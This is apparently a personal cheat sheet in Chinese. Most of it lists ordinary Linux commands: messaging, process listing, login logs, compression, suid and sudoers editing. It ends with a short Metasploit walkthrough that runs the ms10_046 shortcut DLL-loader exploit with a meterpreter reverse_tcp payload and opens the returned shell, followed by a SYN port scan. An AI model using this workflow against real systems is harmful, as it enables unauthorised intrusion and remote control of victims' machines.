mesg 发送信息给root y n write/talk 写消息给 wall 给所有用户发送消息 ps -aux ps -elF pstree 命令行跳转:CTRL+a行首 CTRL+e行尾 CTRL+u清除光标左侧至开头 CTRL+k清除光标右侧至结尾 CTRL+左右键 history -c 清除所有命令 history -d 500 10 从第500个历史开始 删除10个命令记录 tr 'a-z' 'A-Z' 替换命令 wc -l grep --color -i -v显示没有被模式匹配到的行 sed(Stream EDitor) 流编辑器 - 行编辑器 awk 给文件添加特殊权限 suid: chmod u+s FILENAME SGID 查看用户登录情况及日志: w whoami who last所有登录主机用户时间日志 lastb登录错误日志 lastlog所有用户登录日志总揽 mail查看邮件 命令gzip bzip2 xz 压缩文件,并且会删除原文件, 解压缩gunzip zcat bzcat查看压缩文件 但是不解压 这几个命令是无法压缩文件夹的,只能压缩文件 zip 可以压缩文件夹, 并且得指定压缩后文件名xxx.zip 不删除源文件 tar -xzvf解压缩并展开归档 -czvf归档并压缩 visudo 专门用来编辑 /etc/sudoers 1)chmod u+w /etc/sudoers 2) vi /etc/sudoers user1 ALL=(ALL) ALL 这就使得用户user1,可以使用sudo命令,执行超级权限了。 3) 最后撤销/etc/sudoer文件的权限 chmod u-w /etc/sudoers kali下metaexploit使用: msfconsole进入msf armitage图形化界面 exploit模块: use exploit/windows/brower/ms10_046_shortcut_icon_dllloader //使用哪个exploit show options //查看需要配置的参数 set SRVHOST 192.XXX set PAYLOAD windows/meterpreter/reverse_tcp //配置exploit成功后 使用的payload show options set LHOST 192.XXX sessions -i 1 //如果攻击成功 进入攻击成功后获取的反弹的CMDSHELL auxiliary模块: use auxiliary/scanner/portscan/syn